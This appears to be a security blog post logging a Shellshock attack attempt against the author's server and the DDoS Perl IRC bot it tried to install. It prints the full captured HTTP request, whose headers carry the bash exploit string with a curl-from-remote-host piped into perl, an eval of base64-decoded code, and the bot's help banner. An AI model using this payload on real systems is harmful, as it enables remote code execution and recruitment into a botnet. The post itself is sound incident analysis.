Attack of the Day

My New Toy

** Standard Warnings Apply **
Let me help you understand..

Interesting attack for today…  The attack vector on this one is pretty much like the 100’s of others I’ve seen today.  Hoping for a vulnerable bash version, it would seem.  Assuming they found an open system, they wanted to make sure I received a copy of something.

GET /cgi-bin-sdb/printenv HTTP/1.0
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
User-Agent: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
Test: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl 
X-Forwarded-For: 72.249.118.225

Now, I felt kind of bad since they didn’t exploit the system and it looks like they *really* wanted me to have that file.  Of course, I grabbed a copy so they felt like their efforts were appreciated. The contents delivered by index.cgi was a fairly large perl script which was exactly 3 lines long. The important one is below.

eval ( decode_base64('LotsOfBase64EncodedStuffs'));

Always the curious one, I had to decode that. It ended up being a v1.0 DDoS Perl bot.. The IRC server they used to control was near the top and very easy to find. They had the channel admins listed in there, also.  Looks like it would have been a pretty decent bot.

######################################################################################################################
######################################################################################################################
##  DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team       ## [ Help ] ###########################################
##      Stealth MultiFunctional IrcBot writen in Perl          #######################################################
##        Teste on every system with PERL instlled             ##  !u @system                                       ##
##                                                             ##  !u @version                                      ##
##     This is a free program used on your own risk.           ##  !u @channel                                      ##
##        Created for educational purpose only.                ##  !u @flood                                        ##
## I'm not responsible for the illegal use of this program.    ##  !u @utils                                        ##

Leave a Reply

Your email address will not be published. Required fields are marked *